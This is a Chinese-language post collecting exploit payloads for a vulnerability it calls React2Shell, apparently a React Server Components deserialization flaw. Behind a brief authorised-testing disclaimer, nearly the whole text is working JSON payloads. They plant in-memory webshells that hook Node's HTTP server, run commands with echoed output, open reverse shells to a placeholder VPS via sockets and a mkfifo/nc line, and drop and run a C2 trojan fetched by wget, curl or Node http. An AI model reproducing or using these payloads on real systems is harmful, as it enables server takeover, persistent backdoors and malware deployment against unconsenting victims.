React2Shell的一些payload
免责声明
本文的知识内容,仅供网络安全从业人员学习参考
用于已获得合法授权的网站测试,请勿用于其它用途
请勿使用本文中的工具、技术及资料,
对任何未经授权的网站、系统进行测试,
否则,所造成的直接或间接后果,
均由您自行承担
内存马
| { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "(async()=>{const http=await import('node:http');const url=await import('node:url');const cp=await import('node:child_process');const originalEmit=http.Server.prototype.emit;http.Server.prototype.emit=function(event,...args){if(event==='request'){const[req,res]=args;const parsedUrl=url.parse(req.url,true);if(parsedUrl.pathname==='/exec'){const cmd=parsedUrl.query.cmd||'whoami';cp.exec(cmd,(err,stdout,stderr)=>{res.writeHead(200,{'Content-Type':'application/json'});res.end(JSON.stringify({success:!err,stdout,stderr,error:err?err.message:null}));});return true;}}return originalEmit.apply(this,arguments);};})();", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } }
| { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "try{var h=process.mainModule.require('http');var c=process.mainModule.require('child_process');var u=process.mainModule.require('url');if(!h.Server.prototype.emit.__hooked){var o=h.Server.prototype.emit;h.Server.prototype.emit=function(e,q,s){if(e==='request'&&q.url&&q.url.indexOf('/health-check-api')!==-1){try{var p=u.parse(q.url,true);var cmd=p.query.c||'id';c.exec(cmd,function(E,O,R){if(!s.headersSent){s.writeHead(200,{'Content-Type':'text/plain'});}s.end(O+R)})}catch(ex){s.end(ex.toString())}return true}return o.apply(this,arguments)};h.Server.prototype.emit.__hooked=true}}catch(e){}", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } }
| { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var h=process.mainModule.require('http'),c=process.mainModule.require('child_process');if(!h.Server.prototype.emit.__h){var o=h.Server.prototype.emit;h.Server.prototype.emit=function(e,q,s){if(e==='request'&&q.headers&&q.headers['x-k']==='MS'){try{c.exec(q.headers['c']||'id',function(E,O,R){if(!s.headersSent)s.writeHead(200);s.end(O+R)})}catch(x){return o.apply(this,arguments)}return true}return o.apply(this,arguments)};h.Server.prototype.emit.__h=true}", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } }
RCE有回显(会造成阻塞,只建议用来验证漏洞)
spawnSync
| { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var res=process.mainModule.require('child_process').spawnSync('cat',['server.js'],{timeout:2000}).stdout.toString();throw Object.assign(new Error('x'),{digest:res});", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } }
execSync
| { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var res=process.mainModule.require('child_process').execSync('id').toString();throw Object.assign(new Error('x'),{digest:res});", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } }
RCE无回显(适合反弹shell)
spawn
| { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var net=process.mainModule.require('net'),cp=process.mainModule.require('child_process'),sh=cp.spawn('/bin/sh',[]);var client=new net.Socket();client.connect(vps port,'vps ip',function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client)});var res='connected';throw Object.assign(new Error('x'),{digest:res});", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } }
| { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var res=process.mainModule.require('child_process').spawn('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc vpsip vps port >/tmp/f',[],{ shell: true }).stdout.toString();throw Object.assign(new Error('x'),{digest:res});", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } }
exec
| { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var res=process.mainModule.require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc vpsip vpsport >/tmp/f').toString();throw Object.assign(new Error('x'),{digest:res});", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } }
C2上线
方案一:Base64 纯写入
| { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var fs=process.mainModule.require('fs'),cp=process.mainModule.require('child_process');var b64='base64代码';fs.writeFileSync('/tmp/shell',Buffer.from(b64,'base64'));cp.spawnSync('chmod',['+x','/tmp/shell']);var p=cp.spawn('/tmp/shell',[],{detached:true,stdio:'ignore'});p.unref();var res='[MS] Trojan Dropped & Running. PID:'+p.pid;throw Object.assign(new Error('x'),{digest:res});", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } }
方案二:系统 Wget/Curl 下载
| { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var cp=process.mainModule.require('child_process');cp.spawnSync('/bin/sh',['-c','(wget -q -O /tmp/shell http://vps/tcp_linux_amd64 || curl -s -o /tmp/shell http://vps/tcp_linux_amd64) && chmod +x /tmp/shell && /tmp/shell &'],{timeout:5000});var res='[MS] Download Command Triggered via Shell';throw Object.assign(new Error('x'),{digest:res});", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } }
方案三:Node.js 原生下载
| { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var h=process.mainModule.require('http'),f=process.mainModule.require('fs'),c=process.mainModule.require('child_process');var s=f.createWriteStream('/tmp/shell');h.get('http://vps/tcp_linux_amd64',function(r){r.pipe(s);s.on('finish',function(){s.close(function(){c.spawnSync('chmod',['+x','/tmp/shell']);var p=c.spawn('/tmp/shell',[],{detached:true,stdio:'ignore'});p.unref();})})});var res='[MS] Node.js Native Download Started in Background';throw Object.assign(new Error('x'),{digest:res});", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } }
可以配合下一篇文章《VShell无VPS上线的几种方式》来进行测试
以上方式均基于合法授权测试环境演示,请严格遵守网络安全法律法规,仅在授权范围内使用相关技术。
**注:**本文仅介绍几种典型方案,实际可用的方法与工具远不止于此。文章内容若有错漏,或您有更好的方案,欢迎留言交流。